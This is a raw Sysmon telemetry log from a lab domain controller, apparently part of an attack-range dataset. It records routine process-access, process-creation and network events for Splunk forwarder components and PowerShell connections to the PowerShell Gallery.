15:52:24.860{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003884Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.860{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003883Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.860{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003882Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.860{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003881Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.860{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003880Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.860{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CB8-5FA1-C200-000000008801}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003879Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.860{D28789B6-7C73-5FA1-3300-000000008801}26763928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CB8-5FA1-C200-000000008801}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003878Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.861{D28789B6-7CB8-5FA1-C200-000000008801}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000003877Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:22.703{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50329-false168.61.186.235-443https 354300x80000000000000003876Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:22.568{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50328-false172.227.168.22a172-227-168-22.deploy.static.akamaitechnologies.com443https 10341000x80000000000000003875Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.156{D28789B6-7CB8-5FA1-C100-000000008801}37363740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000003874Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:21.959{D28789B6-7CB1-5FA1-BD00-000000008801}4512www.powershellgallery.com0type: 5 powershellgallerytrafficmanager.trafficmanager.net;type: 5 psg-prod-centralus.cloudapp.net;::ffff:168.61.186.235;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000003873Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.015{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CB8-5FA1-C100-000000008801}3736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003872Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.015{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003871Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.015{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003870Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.015{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003869Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.015{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003868Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.015{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003867Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.015{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003866Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.015{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003865Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.015{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003864Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.015{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003863Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.015{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CB8-5FA1-C100-000000008801}3736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003862Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.015{D28789B6-7C73-5FA1-3300-000000008801}26763928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CB8-5FA1-C100-000000008801}3736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003861Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.016{D28789B6-7CB8-5FA1-C100-000000008801}3736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000003892Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:23.601{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50331-false168.61.186.235-443https 354300x80000000000000003891Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:23.468{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50330-false172.227.168.22a172-227-168-22.deploy.static.akamaitechnologies.com443https 10341000x80000000000000003906Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:26.723{D28789B6-7CBA-5FA1-C300-000000008801}47441164C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003905Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:26.582{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CBA-5FA1-C300-000000008801}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003904Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:26.582{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003903Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 